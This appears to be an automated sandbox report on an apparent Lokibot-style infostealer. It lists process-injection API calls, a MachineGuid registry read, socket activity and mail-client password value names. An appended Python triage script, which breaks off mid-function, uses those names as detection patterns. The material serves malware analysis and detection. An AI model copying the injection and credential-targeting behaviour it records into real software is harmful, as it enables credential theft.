                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0722F746
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0722F746
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0722F9D0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B9D647
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B9D647
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0722F80E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B9AFB9,00000800,00000000,00000000), ref: 02B9B1CA
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0722F80E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B9AFB9,00000800,00000000,00000000), ref: 02B9B1CA
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02B9AF3E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761667197.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_113d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761742784.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_114d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761742784.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_114d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761742784.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_114d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761667197.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_113d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761742784.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_114d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761667197.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_113d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761667197.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_113d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.3%
                                                Total number of Nodes:300
                                                Total number of Limit Nodes:13
                                                 execution_graph: serialized node and edge list of the execution graph (node ids, function addresses in the 0x402b7c-0x413da0 range and per-node API-call counts); the API calls named in the graph are LoadLibraryW, WSAStartup, GetProcessHeap, HeapAlloc, HeapFree, GetPEB, ExitProcess, RegOpenKeyExA, RegQueryValueExA and RegCloseKey.

                                                Control-flow Graph

                                                APIs
                                                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                • GetLastError.KERNEL32 ref: 0041399E
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Error$CreateLastModeMutex
                                                • String ID:
                                                • API String ID: 3448925889-0
                                                • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                  • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                • String ID:
                                                • API String ID: 3676486918-0
                                                • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 82 404df3-404e16 WSAStartup
                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID:
                                                • API String ID: 724789610-0
                                                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                                                APIs
                                                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                                                • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                                                APIs
                                                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 0040438F
                                                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                • VariantInit.OLEAUT32(?), ref: 004043C4
                                                • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                • VariantInit.OLEAUT32(?), ref: 00404414
                                                • SysAllocString.OLEAUT32(?), ref: 00404419
                                                • VariantInit.OLEAUT32(?), ref: 00404431
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                • String ID:
                                                • API String ID: 1312198159-0
                                                • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                • API String ID: 0-2111798378
                                                • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _wmemset$ErrorLast
                                                • String ID: IDA$IDA
                                                • API String ID: 887189805-2020647798
                                                • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                • socket.WS2_32(?,?,?), ref: 00404E7A
                                                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: freeaddrinfogetaddrinfosocket
                                                • String ID:
                                                • API String ID: 2479546573-0
                                                • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%
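The API and String ID entries above are the raw per-function output of the analyzer. As an added example (not part of the report and not Joe Sandbox code), the following Python script parses bullet lines in exactly that format, groups them per entry, decodes the flag arguments that matter for triage (the samDesired of the RegOpenKeyExA call, the SetErrorMode mask, the Winsock version passed to WSAStartup, the recv length) and flags the API/string combinations a Lokibot triage looks for: the MachineGuid registry read, the CreateMutexW/GetLastError pair, the getaddrinfo/socket client setup and the mail-client account/password value names. The sample text is constructed from lines copied from the entries above; the rule labels are this example's own names for the behaviours, not terms from the report.

```python
"""Triage helper for the per-function "APIs"/"Strings" entries of a Joe Sandbox report.
Added example, not part of the report or of Joe Sandbox: parses the bullet lines in the
format shown above, decodes a few flag arguments and flags the API/string combinations
a Lokibot triage looks for. SAMPLE is constructed from lines copied from this report."""
import re

# Constructed sample: bullet lines copied from the report entries above.
SAMPLE = """\
APIs
• SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
• CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
• GetLastError.KERNEL32 ref: 0041399E
APIs
• Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
• RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
• RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
APIs
• WSAStartup.WS2_32(00000202,?), ref: 00404E08
APIs
• recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
APIs
• getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
• socket.WS2_32(?,?,?), ref: 00404E7A
• freeaddrinfo.WS2_32(00000000), ref: 00404E90
Strings
• String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
"""

API_LINE = re.compile(r"•\s*(?P<sub>Part of subcall function [0-9A-F]{8}:\s*)?(?P<api>\w+)\.(?P<mod>\w+)"
                      r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
STRING_LINE = re.compile(r"•\s*String ID:\s*(?P<ids>.*)")
HEX8 = re.compile(r"[0-9A-F]{8}")
# Win32 flag names for the arguments decoded in describe().
SAM_FLAGS = {0x20019: "KEY_READ", 0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY"}
ERRMODE_FLAGS = {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX", 0x8000: "SEM_NOOPENFILEERRORBOX"}

def parse_entries(text):
    """One entry per 'APIs'/'Strings' heading: its parsed API calls and '$'-split String IDs."""
    entries = []
    for line in (l.strip() for l in text.splitlines()):
        if line in ("APIs", "Strings"):
            entries.append({"calls": [], "strings": []})
            continue
        m = API_LINE.search(line) if entries else None
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            entries[-1]["calls"].append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                                         "ref": int(m.group("ref"), 16), "subcall": m.group("sub") is not None})
            continue
        s = STRING_LINE.search(line) if entries else None
        if s and s.group("ids").strip():
            entries[-1]["strings"].extend(s.group("ids").strip().split("$"))
    return entries

def decode_flags(value, table):
    names = [name for bit, name in table.items() if value & bit == bit]
    return "|".join(names) or hex(value)

def describe(call):
    """Decode the arguments that matter for triage; positions follow the Win32 prototypes."""
    args = call["args"]
    hexarg = lambda i: int(args[i], 16) if i < len(args) and HEX8.fullmatch(args[i]) else None
    api = call["api"]
    if api == "RegOpenKeyExA" and hexarg(3) is not None:   # samDesired
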